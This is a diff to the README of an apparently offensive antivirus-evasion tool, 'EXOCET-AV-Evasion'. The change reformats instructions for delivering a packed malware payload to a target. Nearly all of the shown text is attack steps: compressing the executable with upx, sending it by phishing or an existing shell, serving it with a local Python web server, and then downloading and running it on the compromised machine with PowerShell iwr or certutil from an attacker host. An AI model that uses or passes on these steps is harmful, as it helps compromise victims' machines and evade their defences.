tanc7/EXOCET-AV-Evasion/README.md

 upx --best outputmalware.exe
 ```

 Then drop the payload on your target.
-Using something like a phishing email, link, or if you already have shell access, deliver it using something like hosting your own server locally `python -m http.server 80' and then on the machine you are compromising, run as a powershell prompt `iwr -Uri "http://yourip/outputmalware.exe" -OutFile "NotMalware.exe"` or `certutil.exe -urlcache -split -f http://yourip/outputmalware.exe` and then `outputmalware.exe`
+Using something like a phishing email, link, or if you already have shell access, deliver it using something like hosting your own server locally
+`python -m http.server 80'`
+and then on the machine you are compromising, run as a powershell prompt
+`iwr -Uri "http://yourip/outputmalware.exe" -OutFile "NotMalware.exe"`
+or
+`certutil.exe -urlcache -split -f http://yourip/outputmalware.exe`
+and then execute with `outputmalware.exe`

 <br>